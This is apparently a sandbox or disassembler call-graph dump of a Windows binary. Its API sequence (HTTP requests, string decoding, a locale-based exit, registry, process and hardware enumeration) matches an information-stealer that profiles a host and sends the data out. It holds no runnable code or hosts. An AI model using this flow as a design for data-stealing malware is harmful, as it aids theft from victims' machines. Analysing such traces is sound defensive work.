14736 86a740 lstrcpy 14735->14736 14737 85490b InternetOpenA StrCmpCA 14736->14737 14738 854944 14737->14738 14739 854955 14738->14739 14740 854ecb InternetCloseHandle 14738->14740 15787 868b60 14739->15787 14741 854ee8 14740->14741 15782 859ac0 CryptStringToBinaryA 14741->15782 14743 854963 15795 86a920 14743->15795 14746 854976 14748 86a8a0 lstrcpy 14746->14748 14753 85497f 14748->14753 14749 86a820 2 API calls 14750 854f05 14749->14750 14752 86a9b0 4 API calls 14750->14752 14751 854f27 ctype 14755 86a7a0 lstrcpy 14751->14755 14754 854f1b 14752->14754 14757 86a9b0 4 API calls 14753->14757 14756 86a8a0 lstrcpy 14754->14756 14768 854f57 14755->14768 14756->14751 14758 8549a9 14757->14758 14759 86a8a0 lstrcpy 14758->14759 14760 8549b2 14759->14760 14761 86a9b0 4 API calls 14760->14761 14762 8549d1 14761->14762 14763 86a8a0 lstrcpy 14762->14763 14764 8549da 14763->14764 14765 86a920 3 API calls 14764->14765 14766 8549f8 14765->14766 14767 86a8a0 lstrcpy 14766->14767 14769 854a01 14767->14769 14768->13789 14770 86a9b0 4 API calls 14769->14770 14771 854a20 14770->14771 14772 86a8a0 lstrcpy 14771->14772 14773 854a29 14772->14773 14774 86a9b0 4 API calls 14773->14774 14775 854a48 14774->14775 14776 86a8a0 lstrcpy 14775->14776 14777 854a51 14776->14777 14778 86a9b0 4 API calls 14777->14778 14779 854a7d 14778->14779 14780 86a920 3 API calls 14779->14780 14781 854a84 14780->14781 14782 86a8a0 lstrcpy 14781->14782 14783 854a8d 14782->14783 14784 854aa3 InternetConnectA 14783->14784 14784->14740 14785 854ad3 HttpOpenRequestA 14784->14785 14787 854ebe InternetCloseHandle 14785->14787 14788 854b28 14785->14788 14787->14740 14789 86a9b0 4 API calls 14788->14789 14790 854b3c 14789->14790 14791 86a8a0 lstrcpy 14790->14791 14792 854b45 14791->14792 14793 86a920 3 API calls 14792->14793 14794 854b63 14793->14794 14795 86a8a0 lstrcpy 14794->14795 14796 854b6c 14795->14796 14797 86a9b0 4 API calls 14796->14797 14798 854b8b 14797->14798 14799 86a8a0 lstrcpy 14798->14799 14800 854b94 14799->14800 14801 86a9b0 4 API calls 14800->14801 14802 854bb5 14801->14802 14803 86a8a0 lstrcpy 14802->14803 14804 854bbe 14803->14804 14805 86a9b0 4 API calls 14804->14805 14806 854bde 14805->14806 14807 86a8a0 lstrcpy 14806->14807 14808 854be7 14807->14808 14809 86a9b0 4 API calls 14808->14809 14810 854c06 14809->14810 14811 86a8a0 lstrcpy 14810->14811 14812 854c0f 14811->14812 14813 86a920 3 API calls 14812->14813 14814 854c2d 14813->14814 14815 86a8a0 lstrcpy 14814->14815 14816 854c36 14815->14816 14817 86a9b0 4 API calls 14816->14817 14818 854c55 14817->14818 14819 86a8a0 lstrcpy 14818->14819 14820 854c5e 14819->14820 14821 86a9b0 4 API calls 14820->14821 14822 854c7d 14821->14822 14823 86a8a0 lstrcpy 14822->14823 14824 854c86 14823->14824 14825 86a920 3 API calls 14824->14825 14826 854ca4 14825->14826 14827 86a8a0 lstrcpy 14826->14827 14828 854cad 14827->14828 14829 86a9b0 4 API calls 14828->14829 14830 854ccc 14829->14830 14831 86a8a0 lstrcpy 14830->14831 14832 854cd5 14831->14832 14833 86a9b0 4 API calls 14832->14833 14834 854cf6 14833->14834 14835 86a8a0 lstrcpy 14834->14835 14836 854cff 14835->14836 14837 86a9b0 4 API calls 14836->14837 14838 854d1f 14837->14838 14839 86a8a0 lstrcpy 14838->14839 14840 854d28 14839->14840 14841 86a9b0 4 API calls 14840->14841 14842 854d47 14841->14842 14843 86a8a0 lstrcpy 14842->14843 14844 854d50 14843->14844 14845 86a920 3 API calls 14844->14845 14846 854d6e 14845->14846 14847 86a8a0 lstrcpy 14846->14847 14848 854d77 14847->14848 14849 86a740 lstrcpy 14848->14849 14850 854d92 14849->14850 14851 86a920 3 API calls 14850->14851 14852 854db3 14851->14852 14853 86a920 3 API calls 14852->14853 14854 854dba 14853->14854 14855 86a8a0 lstrcpy 14854->14855 14856 854dc6 14855->14856 14857 854de7 lstrlen 14856->14857 14858 854dfa 14857->14858 14859 854e03 lstrlen 14858->14859 15801 86aad0 14859->15801 14861 854e13 HttpSendRequestA 14862 854e32 InternetReadFile 14861->14862 14863 854e67 InternetCloseHandle 14862->14863 14868 854e5e 14862->14868 14866 86a800 14863->14866 14865 86a9b0 4 API calls 14865->14868 14866->14787 14867 86a8a0 lstrcpy 14867->14868 14868->14862 14868->14863 14868->14865 14868->14867 15803 86aad0 14869->15803 14871 8617c4 StrCmpCA 14872 8617cf ExitProcess 14871->14872 14873 8617d7 14871->14873 14874 8619c2 14873->14874 14875 8618cf StrCmpCA 14873->14875 14876 8618ad StrCmpCA 14873->14876 14877 861932 StrCmpCA 14873->14877 14878 861913 StrCmpCA 14873->14878 14879 861970 StrCmpCA 14873->14879 14880 8618f1 StrCmpCA 14873->14880 14881 861951 StrCmpCA 14873->14881 14882 86187f StrCmpCA 14873->14882 14883 86185d StrCmpCA 14873->14883 14884 86a820 lstrlen lstrcpy 14873->14884 14874->13791 14875->14873 14876->14873 14877->14873 14878->14873 14879->14873 14880->14873 14881->14873 14882->14873 14883->14873 14884->14873 14886 86a7a0 lstrcpy 14885->14886 14887 855979 14886->14887 14888 8547b0 2 API calls 14887->14888 14889 855985 14888->14889 14890 86a740 lstrcpy 14889->14890 14891 8559ba 14890->14891 14892 86a740 lstrcpy 14891->14892 14893 8559c7 14892->14893 14894 86a740 lstrcpy 14893->14894 14895 8559d4 14894->14895 14896 86a740 lstrcpy 14895->14896 14897 8559e1 14896->14897 14898 86a740 lstrcpy 14897->14898 14899 8559ee InternetOpenA StrCmpCA 14898->14899 14900 855a1d 14899->14900 14901 855fc3 InternetCloseHandle 14900->14901 14903 868b60 3 API calls 14900->14903 14902 855fe0 14901->14902 14906 859ac0 4 API calls 14902->14906 14904 855a3c 14903->14904 14905 86a920 3 API calls 14904->14905 14907 855a4f 14905->14907 14908 855fe6 14906->14908 14909 86a8a0 lstrcpy 14907->14909 14910 86a820 2 API calls 14908->14910 14912 85601f ctype 14908->14912 14914 855a58 14909->14914 14911 855ffd 14910->14911 14913 86a9b0 4 API calls 14911->14913 14916 86a7a0 lstrcpy 14912->14916 14915 856013 14913->14915 14918 86a9b0 4 API calls 14914->14918 14917 86a8a0 lstrcpy 14915->14917 14926 85604f 14916->14926 14917->14912 14919 855a82 14918->14919 14920 86a8a0 lstrcpy 14919->14920 14921 855a8b 14920->14921 14922 86a9b0 4 API calls 14921->14922 14923 855aaa 14922->14923 14924 86a8a0 lstrcpy 14923->14924 14925 855ab3 14924->14925 14927 86a920 3 API calls 14925->14927 14926->13797 14928 855ad1 14927->14928 14929 86a8a0 lstrcpy 14928->14929 14930 855ada 14929->14930 14931 86a9b0 4 API calls 14930->14931 14932 855af9 14931->14932 14933 86a8a0 lstrcpy 14932->14933 14934 855b02 14933->14934 14935 86a9b0 4 API calls 14934->14935 14936 855b21 14935->14936 14937 86a8a0 lstrcpy 14936->14937 14938 855b2a 14937->14938 14939 86a9b0 4 API calls 14938->14939 14940 855b56 14939->14940 14941 86a920 3 API calls 14940->14941 14942 855b5d 14941->14942 14943 86a8a0 lstrcpy 14942->14943 14944 855b66 14943->14944 14945 855b7c InternetConnectA 14944->14945 14945->14901 14946 855bac HttpOpenRequestA 14945->14946 14948 855fb6 InternetCloseHandle 14946->14948 14949 855c0b 14946->14949 14948->14901 14950 86a9b0 4 API calls 14949->14950 14951 855c1f 14950->14951 14952 86a8a0 lstrcpy 14951->14952 14953 855c28 14952->14953 14954 86a920 3 API calls 14953->14954 14955 855c46 14954->14955 14956 86a8a0 lstrcpy 14955->14956 14957 855c4f 14956->14957 14958 86a9b0 4 API calls 14957->14958 14959 855c6e 14958->14959 14960 86a8a0 lstrcpy 14959->14960 14961 855c77 14960->14961 14962 86a9b0 4 API calls 14961->14962 14963 855c98 14962->14963 14964 86a8a0 lstrcpy 14963->14964 14965 855ca1 14964->14965 14966 86a9b0 4 API calls 14965->14966 14967 855cc1 14966->14967 14968 86a8a0 lstrcpy 14967->14968 14969 855cca 14968->14969 14970 86a9b0 4 API calls 14969->14970 14971 855ce9 14970->14971 14972 86a8a0 lstrcpy 14971->14972 14973 855cf2 14972->14973 14974 86a920 3 API calls 14973->14974 14975 855d10 14974->14975 14976 86a8a0 lstrcpy 14975->14976 14977 855d19 14976->14977 14978 86a9b0 4 API calls 14977->14978 14979 855d38 14978->14979 14980 86a8a0 lstrcpy 14979->14980 14981 855d41 14980->14981 14982 86a9b0 4 API calls 14981->14982 14983 855d60 14982->14983 14984 86a8a0 lstrcpy 14983->14984 14985 855d69 14984->14985 14986 86a920 3 API calls 14985->14986 14987 855d87 14986->14987 14988 86a8a0 lstrcpy 14987->14988 14989 855d90 14988->14989 14990 86a9b0 4 API calls 14989->14990 14991 855daf 14990->14991 14992 86a8a0 lstrcpy 14991->14992 14993 855db8 14992->14993 14994 86a9b0 4 API calls 14993->14994 14995 855dd9 14994->14995 14996 86a8a0 lstrcpy 14995->14996 14997 855de2 14996->14997 14998 86a9b0 4 API calls 14997->14998 14999 855e02 14998->14999 15000 86a8a0 lstrcpy 14999->15000 15001 855e0b 15000->15001 15002 86a9b0 4 API calls 15001->15002 15003 855e2a 15002->15003 15004 86a8a0 lstrcpy 15003->15004 15005 855e33 15004->15005 15006 86a920 3 API calls 15005->15006 15007 855e54 15006->15007 15008 86a8a0 lstrcpy 15007->15008 15009 855e5d 15008->15009 15010 855e70 lstrlen 15009->15010 15804 86aad0 15010->15804 15012 855e81 lstrlen GetProcessHeap RtlAllocateHeap 15805 86aad0 15012->15805 15014 855eae lstrlen 15015 855ebe 15014->15015 15016 855ed7 lstrlen 15015->15016 15017 855ee7 15016->15017 15018 855ef0 lstrlen 15017->15018 15019 855f04 15018->15019 15020 855f1a lstrlen 15019->15020 15806 86aad0 15020->15806 15022 855f2a HttpSendRequestA 15023 855f35 InternetReadFile 15022->15023 15024 855f6a InternetCloseHandle 15023->15024 15028 855f61 15023->15028 15024->14948 15026 86a9b0 4 API calls 15026->15028 15027 86a8a0 lstrcpy 15027->15028 15028->15023 15028->15024 15028->15026 15028->15027 15031 861077 15029->15031 15030 861151 15030->13799 15031->15030 15032 86a820 lstrlen lstrcpy 15031->15032 15032->15031 15034 860db7 15033->15034 15035 860f17 15034->15035 15036 860e27 StrCmpCA 15034->15036 15037 860e67 StrCmpCA 15034->15037 15038 860ea4 StrCmpCA 15034->15038 15039 86a820 lstrlen lstrcpy 15034->15039 15035->13807 15036->15034 15037->15034 15038->15034 15039->15034 15044 860f67 15040->15044 15041 861044 15041->13815 15042 860fb2 StrCmpCA 15042->15044 15043 86a820 lstrlen lstrcpy 15043->15044 15044->15041 15044->15042 15044->15043 15046 86a740 lstrcpy 15045->15046 15047 861a26 15046->15047 15048 86a9b0 4 API calls 15047->15048 15049 861a37 15048->15049 15050 86a8a0 lstrcpy 15049->15050 15051 861a40 15050->15051 15052 86a9b0 4 API calls 15051->15052 15053 861a5b 15052->15053 15054 86a8a0 lstrcpy 15053->15054 15055 861a64 15054->15055 15056 86a9b0 4 API calls 15055->15056 15057 861a7d 15056->15057 15058 86a8a0 lstrcpy 15057->15058 15059 861a86 15058->15059 15060 86a9b0 4 API calls 15059->15060 15061 861aa1 15060->15061 15062 86a8a0 lstrcpy 15061->15062 15063 861aaa 15062->15063 15064 86a9b0 4 API calls 15063->15064 15065 861ac3 15064->15065 15066 86a8a0 lstrcpy 15065->15066 15067 861acc 15066->15067 15068 86a9b0 4 API calls 15067->15068 15069 861ae7 15068->15069 15070 86a8a0 lstrcpy 15069->15070 15071 861af0 15070->15071 15072 86a9b0 4 API calls 15071->15072 15073 861b09 15072->15073 15074 86a8a0 lstrcpy 15073->15074 15075 861b12 15074->15075 15076 86a9b0 4 API calls 15075->15076 15077 861b2d 15076->15077 15078 86a8a0 lstrcpy 15077->15078 15079 861b36 15078->15079 15080 86a9b0 4 API calls 15079->15080 15081 861b4f 15080->15081 15082 86a8a0 lstrcpy 15081->15082 15083 861b58 15082->15083 15084 86a9b0 4 API calls 15083->15084 15085 861b76 15084->15085 15086 86a8a0 lstrcpy 15085->15086 15087 861b7f 15086->15087 15088 867500 6 API calls 15087->15088 15089 861b96 15088->15089 15090 86a920 3 API calls 15089->15090 15091 861ba9 15090->15091 15092 86a8a0 lstrcpy 15091->15092 15093 861bb2 15092->15093 15094 86a9b0 4 API calls 15093->15094 15095 861bdc 15094->15095 15096 86a8a0 lstrcpy 15095->15096 15097 861be5 15096->15097 15098 86a9b0 4 API calls 15097->15098 15099 861c05 15098->15099 15100 86a8a0 lstrcpy 15099->15100 15101 861c0e 15100->15101 15807 867690 GetProcessHeap RtlAllocateHeap 15101->15807 15104 86a9b0 4 API calls 15105 861c2e 15104->15105 15106 86a8a0 lstrcpy 15105->15106 15107 861c37 15106->15107 15108 86a9b0 4 API calls 15107->15108 15109 861c56 15108->15109 15110 86a8a0 lstrcpy 15109->15110 15111 861c5f 15110->15111 15112 86a9b0 4 API calls 15111->15112 15113 861c80 15112->15113 15114 86a8a0 lstrcpy 15113->15114 15115 861c89 15114->15115 15814 8677c0 GetCurrentProcess IsWow64Process 15115->15814 15118 86a9b0 4 API calls 15119 861ca9 15118->15119 15120 86a8a0 lstrcpy 15119->15120 15121 861cb2 15120->15121 15122 86a9b0 4 API calls 15121->15122 15123 861cd1 15122->15123 15124 86a8a0 lstrcpy 15123->15124 15125 861cda 15124->15125 15126 86a9b0 4 API calls 15125->15126 15127 861cfb 15126->15127 15128 86a8a0 lstrcpy 15127->15128 15129 861d04 15128->15129 15130 867850 3 API calls 15129->15130 15131 861d14 15130->15131 15132 86a9b0 4 API calls 15131->15132 15133 861d24 15132->15133 15134 86a8a0 lstrcpy 15133->15134 15135 861d2d 15134->15135 15136 86a9b0 4 API calls 15135->15136 15137 861d4c 15136->15137 15138 86a8a0 lstrcpy 15137->15138 15139 861d55 15138->15139 15140 86a9b0 4 API calls 15139->15140 15141 861d75 15140->15141 15142 86a8a0 lstrcpy 15141->15142 15143 861d7e 15142->15143 15144 8678e0 3 API calls 15143->15144 15145 861d8e 15144->15145 15146 86a9b0 4 API calls 15145->15146 15147 861d9e 15146->15147 15148 86a8a0 lstrcpy 15147->15148 15149 861da7 15148->15149 15150 86a9b0 4 API calls 15149->15150 15151 861dc6 15150->15151 15152 86a8a0 lstrcpy 15151->15152 15153 861dcf 15152->15153 15154 86a9b0 4 API calls 15153->15154 15155 861df0 15154->15155 15156 86a8a0 lstrcpy 15155->15156 15157 861df9 15156->15157 15816 867980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15157->15816 15160 86a9b0 4 API calls 15161 861e19 15160->15161 15162 86a8a0 lstrcpy 15161->15162 15163 861e22 15162->15163 15164 86a9b0 4 API calls 15163->15164 15165 861e41 15164->15165 15166 86a8a0 lstrcpy 15165->15166 15167 861e4a 15166->15167 15168 86a9b0 4 API calls 15167->15168 15169 861e6b 15168->15169 15170 86a8a0 lstrcpy 15169->15170 15171 861e74 15170->15171 15818 867a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15171->15818 15174 86a9b0 4 API calls 15175 861e94 15174->15175 15176 86a8a0 lstrcpy 15175->15176 15177 861e9d 15176->15177 15178 86a9b0 4 API calls 15177->15178 15179 861ebc 15178->15179 15180 86a8a0 lstrcpy 15179->15180 15181 861ec5 15180->15181 15182 86a9b0 4 API calls 15181->15182 15183 861ee5 15182->15183 15184 86a8a0 lstrcpy 15183->15184 15185 861eee 15184->15185 15821 867b00 GetUserDefaultLocaleName 15185->15821 15188 86a9b0 4 API calls 15189 861f0e 15188->15189 15190 86a8a0 lstrcpy 15189->15190 15191 861f17 15190->15191 15192 86a9b0 4 API calls 15191->15192 15193 861f36 15192->15193 15194 86a8a0 lstrcpy 15193->15194 15195 861f3f 15194->15195 15196 86a9b0 4 API calls 15195->15196 15197 861f60 15196->15197 15198 86a8a0 lstrcpy 15197->15198 15199 861f69 15198->15199 15825 867b90 15199->15825 15201 861f80 15202 86a920 3 API calls 15201->15202 15203 861f93 15202->15203 15204 86a8a0 lstrcpy 15203->15204 15205 861f9c 15204->15205 15206 86a9b0 4 API calls 15205->15206 15207 861fc6 15206->15207 15208 86a8a0 lstrcpy 15207->15208 15209 861fcf 15208->15209 15210 86a9b0 4 API calls 15209->15210 15211 861fef 15210->15211 15212 86a8a0 lstrcpy 15211->15212 15213 861ff8 15212->15213 15837 867d80 GetSystemPowerStatus 15213->15837 15216 86a9b0 4 API calls 15217 862018 15216->15217 15218 86a8a0 lstrcpy 15217->15218 15219 862021 15218->15219 15220 86a9b0 4 API calls 15219->15220 15221 862040 15220->15221 15222 86a8a0 lstrcpy 15221->15222 15223 862049 15222->15223 15224 86a9b0 4 API calls 15223->15224 15225 86206a 15224->15225 15226 86a8a0 lstrcpy 15225->15226 15227 862073 15226->15227 15228 86207e GetCurrentProcessId 15227->15228 15839 869470 OpenProcess 15228->15839 15231 86a920 3 API calls 15232 8620a4 15231->15232 15233 86a8a0 lstrcpy 15232->15233 15234 8620ad 15233->15234 15235 86a9b0 4 API calls 15234->15235 15236 8620d7 15235->15236 15237 86a8a0 lstrcpy 15236->15237 15238 8620e0 15237->15238 15239 86a9b0 4 API calls 15238->15239 15240 862100 15239->15240 15241 86a8a0 lstrcpy 15240->15241 15242 862109 15241->15242 15844 867e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15242->15844 15245 86a9b0 4 API calls 15246 862129 15245->15246 15247 86a8a0 lstrcpy 15246->15247 15248 862132 15247->15248 15249 86a9b0 4 API calls 15248->15249 15250 862151 15249->15250 15251 86a8a0 lstrcpy 15250->15251 15252 86215a 15251->15252 15253 86a9b0 4 API calls 15252->15253 15254 86217b 15253->15254 15255 86a8a0 lstrcpy 15254->15255 15256 862184 15255->15256 15848 867f60 15256->15848 15259 86a9b0 4 API calls 15260 8621a4 15259->15260 15261 86a8a0 lstrcpy 15260->15261 15262 8621ad 15261->15262 15263 86a9b0 4 API calls 15262->15263 15264 8621cc 15263->15264 15265 86a8a0 lstrcpy 15264->15265 15266 8621d5 15265->15266 15267 86a9b0 4 API calls 15266->15267 15268 8621f6 15267->15268 15269 86a8a0 lstrcpy 15268->15269 15270 8621ff 15269->15270 15861 867ed0 GetSystemInfo wsprintfA 15270->15861 15273 86a9b0 4 API calls 15274 86221f 15273->15274 15275 86a8a0 lstrcpy 15274->15275 15276 862228 15275->15276 15277 86a9b0 4 API calls 15276->15277 15278 862247 15277->15278 15279 86a8a0 lstrcpy 15278->15279 15280 862250 15279->15280 15281 86a9b0 4 API calls 15280->15281 15282 862270 15281->15282 15283 86a8a0 lstrcpy 15282->15283 15284 862279 15283->15284 15863 868100 GetProcessHeap RtlAllocateHeap 15284->15863 15287 86a9b0 4 API calls 15288 862299 15287->15288 15289 86a8a0 lstrcpy 15288->15289 15290 8622a2 15289->15290 15291 86a9b0 4 API calls 15290->15291 15292 8622c1 15291->15292 15293 86a8a0 lstrcpy 15292->15293 15294 8622ca 15293->15294 15295 86a9b0 4 API calls 15294->15295 15296 8622eb 15295->15296 15297 86a8a0 lstrcpy 15296->15297 15298 8622f4 15297->15298 15869 8687c0 15298->15869 15301 86a920 3 API calls 15302 86231e 15301->15302 15303 86a8a0 lstrcpy 15302->15303 15304 862327 15303->15304 15305 86a9b0 4 API calls 15304->15305 15306 862351 15305->15306 15307 86a8a0 lstrcpy 15306->15307 15308 86235a 15307->15308 15309 86a9b0 4 API calls 15308->15309 15310 86237a 15309->15310 15311 86a8a0 lstrcpy 15310->15311 15312 862383 15311->15312 15313 86a9b0 4 API calls 15312->15313 15314 8623a2 15313->15314 15315 86a8a0 lstrcpy 15314->15315 15316 8623ab 15315->15316 15874 8681f0 15316->15874 15318 8623c2 15319 86a920 3 API calls 15318->15319 15320 8623d5 15319->15320 15321 86a8a0 lstrcpy 15320->15321 15322 8623de 15321->15322 15323 86a9b0 4 API calls 15322->15323 15324 86240a 15323->15324 15325 86a8a0 lstrcpy 15324->15325 15326 862413 15325->15326 15327 86a9b0 4 API calls 15326->15327 15328 862432 15327->15328 15329 86a8a0 lstrcpy 15328->15329 15330 86243b 15329->15330 15331 86a9b0 4 API calls 15330->15331 15332 86245c 15331->15332 15333 86a8a0 lstrcpy 15332->15333 15334 862465 15333->15334 15335 86a9b0 4 API calls 15334->15335 15336 862484 15335->15336 15337 86a8a0 lstrcpy 15336->15337 15338 86248d 15337->15338 15339 86a9b0 4 API calls 15338->15339 15340 8624ae 15339->15340 15341 86a8a0 lstrcpy 15340->15341 15342 8624b7 15341->15342 15882 868320 15342->15882 15344 8624d3 15345 86a920 3 API calls 15344->15345 15346 8624e6 15345->15346 15347 86a8a0 lstrcpy 15346->15347 15348 8624ef 15347->15348 15349 86a9b0 4 API calls 15348->15349 15350 862519 15349->15350 15351 86a8a0 lstrcpy 15350->15351 15352 862522 15351->15352 15353 86a9b0 4 API calls 15352->15353 15354 862543 15353->15354 15355 86a8a0 lstrcpy 15354->15355 15356 86254c 15355->15356 15357 868320 17 API calls 15356->15357 15358 862568 15357->15358 15359 86a920 3 API calls 15358->15359 15360 86257b 15359->15360 15361 86a8a0 lstrcpy 15360->15361 15362 862584 15361->15362 15363 86a9b0 4 API calls 15362->15363 15364 8625ae 15363->15364 15365 86a8a0 lstrcpy 15364->15365 15366 8625b7 15365->15366 15367 86a9b0 4 API calls 15366->15367 15368 8625d6 15367->15368 15369 86a8a0 lstrcpy 15368->15369 15370 8625df 15369->15370 15371 86a9b0 4 API calls 15370->15371 15372 862600 15371->15372 15373 86a8a0 lstrcpy 15372->15373 15374 862609 15373->15374 15918 868680 15374->15918 15376 862620 15377 86a920 3 API calls 15376->15377 15378 862633 15377->15378 15379 86a8a0 lstrcpy 15378->15379 15380 86263c 15379->15380 15381 86265a lstrlen 15380->15381 15382 86266a 15381->15382 15383 86a740 lstrcpy 15382->15383 15384 86267c 15383->15384 15385 851590 lstrcpy 15384->15385 15386 86268d 15385->15386 15928 865190 15386->15928 15388 862699 15388->13819 16116 86aad0 15389->16116 15391 855009 InternetOpenUrlA 15395 855021 15391->15395 15392 8550a0 InternetCloseHandle InternetCloseHandle 15394 8550ec 15392->15394 15393 85502a InternetReadFile 15393->15395 15394->13823 15395->15392 15395->15393 16117 8598d0 15396->16117 15398 860759 15399 860a38 15398->15399 15401 86077d 15398->15401 15400 851590 lstrcpy 15399->15400 15402 860a49 15400->15402 15403 860799 StrCmpCA 15401->15403 16293 860250 15402->16293 15405 8607a8 15403->15405 15406 860843 15403->15406 15408 86a7a0 lstrcpy 15405->15408 15409 860865 StrCmpCA 15406->15409 15410 8607c3 15408->15410 15411 860874 15409->15411 15413 86096b 15409->15413 15412 851590 lstrcpy 15410->15412 15414 86a740 lstrcpy 15411->15414 15415 86080c 15412->15415 15416 86099c StrCmpCA 15413->15416 15417 860881 15414->15417 15418 86a7a0 lstrcpy 15415->15418 15420 860a2d 15416->15420 15421 8609ab 15416->15421 15422 86a9b0 4 API calls 15417->15422 15419 860823 15418->15419 15423 86a7a0 lstrcpy 15419->15423 15420->13827 15424 851590 lstrcpy 15421->15424 15425 8608ac 15422->15425 15426 86083e 15423->15426 15427 8609f4 15424->15427 15428 86a920 3 API calls 15425->15428 16120 85fb00 15426->16120 15430 86a7a0 lstrcpy 15427->15430 15431 8608b3 15428->15431 15432 860a0d 15430->15432 15433 86a9b0 4 API calls 15431->15433 15435 86a7a0 lstrcpy 15432->15435 15434 8608ba 15433->15434 15437 860a28 15435->15437 15768 86a7a0 lstrcpy 15767->15768 15769 851683 15768->15769 15770 86a7a0 lstrcpy 15769->15770 15771 851695 15770->15771 15772 86a7a0 lstrcpy 15771->15772 15773 8516a7 15772->15773 15774 86a7a0 lstrcpy 15773->15774 15775 8515a3 15774->15775 15775->14650 15777 8547c6 15776->15777 15778 854838 lstrlen 15777->15778 15802 86aad0 15778->15802 15780 854848 InternetCrackUrlA 15781 854867 15780->15781 15781->14727 15783 859af9 LocalAlloc 15782->15783 15784 854eee 15782->15784 15783->15784 15785 859b14 CryptStringToBinaryA 15783->15785 15784->14749 15784->14751 15785->15784 15786 859b39 LocalFree 15785->15786 15786->15784 15788 86a740 lstrcpy 15787->15788 15789 868b74 15788->15789 15790 86a740 lstrcpy 15789->15790 15791 868b82 GetSystemTime 15790->15791 15792 868b99 15791->15792 15793 86a7a0 lstrcpy 15792->15793 15794 868bfc 15793->15794 15794->14743 15796 86a931 15795->15796 15797 86a988 15796->15797 15800 86a968 lstrcpy lstrcat 15796->15800 15798 86a7a0 lstrcpy 15797->15798 15799 86a994 15798->15799 15799->14746 15800->15797 15801->14861 15802->15780 15803->14871 15804->15012 15805->15014 15806->15022 15935 8677a0 15807->15935 15810 8676c6 RegOpenKeyExA 15812 8676e7 RegQueryValueExA 15810->15812 15813 867704 RegCloseKey 15810->15813 15811 861c1e 15811->15104 15812->15813 15813->15811 15815 861c99 15814->15815 15815->15118 15817 861e09 15816->15817 15817->15160 15819 861e84 15818->15819 15820 867a9a wsprintfA 15818->15820 15819->15174 15820->15819 15822 861efe 15821->15822 15823 867b4d 15821->15823 15822->15188 15942 868d20 LocalAlloc CharToOemW 15823->15942 15826 86a740 lstrcpy 15825->15826 15827 867bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15826->15827 15836 867c25 15827->15836 15828 867c46 GetLocaleInfoA 15828->15836 15829 867d18 15830 867d1e LocalFree 15829->15830 15831 867d28 15829->15831 15830->15831 15833 86a7a0 lstrcpy 15831->15833 15832 86a9b0 lstrcpy lstrlen lstrcpy lstrcat 15832->15836 15835 867d37 15833->15835 15834 86a8a0 lstrcpy 15834->15836 15835->15201 15836->15828 15836->15829 15836->15832 15836->15834 15838 862008 15837->15838 15838->15216 15840 8694b5 15839->15840 15841 869493 GetModuleFileNameExA CloseHandle 15839->15841 15842 86a740 lstrcpy 15840->15842 15841->15840 15843 862091 15842->15843 15843->15231 15845 867e68 RegQueryValueExA 15844->15845 15847 862119 15844->15847 15846 867e8e RegCloseKey 15845->15846 15846->15847 15847->15245 15849 867fb9 GetLogicalProcessorInformationEx 15848->15849 15850 867fd8 GetLastError 15849->15850 15852 868029 15849->15852 15857 867fe3 15850->15857 15859 868022 15850->15859 15856 8689f0 2 API calls 15852->15856 15854 8689f0 2 API calls 15855 862194 15854->15855 15855->15259 15858 86807b 15856->15858 15857->15849 15857->15855 15943 8689f0 15857->15943 15946 868a10 GetProcessHeap RtlAllocateHeap 15857->15946 15858->15859 15860 868084 wsprintfA 15858->15860 15859->15854 15859->15855 15860->15855 15862 86220f 15861->15862 15862->15273 15864 8689b0 15863->15864 15865 86814d GlobalMemoryStatusEx 15864->15865 15868 868163 __aulldiv 15865->15868 15866 86819b wsprintfA 15867 862289 15866->15867 15867->15287 15868->15866 15870 8687fb GetProcessHeap RtlAllocateHeap wsprintfA 15869->15870 15872 86a740 lstrcpy 15870->15872 15873 86230b 15872->15873 15873->15301 15875 86a740 lstrcpy 15874->15875 15879 868229 15875->15879 15876 868263 15878 86a7a0 lstrcpy 15876->15878 15877 86a9b0 lstrcpy lstrlen lstrcpy lstrcat 15877->15879 15880 8682dc 15878->15880 15879->15876 15879->15877 15881 86a8a0 lstrcpy 15879->15881 15880->15318 15881->15879 15883 86a740 lstrcpy 15882->15883 15884 86835c RegOpenKeyExA 15883->15884 15885 8683d0 15884->15885 15886 8683ae 15884->15886 15888 868613 RegCloseKey 15885->15888 15889 8683f8 RegEnumKeyExA 15885->15889 15887 86a7a0 lstrcpy 15886->15887 15898 8683bd 15887->15898 15890 86a7a0 lstrcpy 15888->15890 15891 86860e 15889->15891 15892 86843f wsprintfA RegOpenKeyExA 15889->15892 15890->15898 15891->15888 15893 868485 RegCloseKey RegCloseKey 15892->15893 15894 8684c1 RegQueryValueExA 15892->15894 15895 86a7a0 lstrcpy 15893->15895 15896 868601 RegCloseKey 15894->15896 15897 8684fa lstrlen 15894->15897 15895->15898 15896->15891 15897->15896 15899 868510 15897->15899 15898->15344 15900 86a9b0 4 API calls 15899->15900 15901 868527 15900->15901 15902 86a8a0 lstrcpy 15901->15902 15903 868533 15902->15903 15904 86a9b0 4 API calls 15903->15904 15905 868557 15904->15905 15906 86a8a0 lstrcpy 15905->15906 15907 868563 15906->15907 15908 86856e RegQueryValueExA 15907->15908 15908->15896 15909 8685a3 15908->15909 15910 86a9b0 4 API calls 15909->15910 15911 8685ba 15910->15911 15912 86a8a0 lstrcpy 15911->15912 15913 8685c6 15912->15913 15914 86a9b0 4 API calls 15913->15914 15915 8685ea 15914->15915 15916 86a8a0 lstrcpy 15915->15916 15917 8685f6 15916->15917 15917->15896 15919 86a740 lstrcpy 15918->15919 15920 8686bc CreateToolhelp32Snapshot Process32First 15919->15920 15921 86875d CloseHandle 15920->15921 15922 8686e8 Process32Next 15920->15922 15923 86a7a0 lstrcpy 15921->15923 15922->15921 15927 8686fd 15922->15927 15926 868776 15923->15926 15924 86a9b0 lstrcpy lstrlen lstrcpy lstrcat 15924->15927 15925 86a8a0 lstrcpy 15925->15927 15926->15376 15927->15922 15927->15924 15927->15925 15929 86a7a0 lstrcpy 15928->15929 15930 8651b5 15929->15930 15931 851590 lstrcpy 15930->15931 15932 8651c6 15931->15932 15947 855100 15932->15947 15934 8651cf 15934->15388 15938 867720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15935->15938 15937 8676b9 15937->15810 15937->15811 15939 867765 RegQueryValueExA 15938->15939 15940 867780 RegCloseKey 15938->15940 15939->15940 15941 867793 15940->15941 15941->15937 15942->15822 15944 868a0c 15943->15944 15945 8689f9 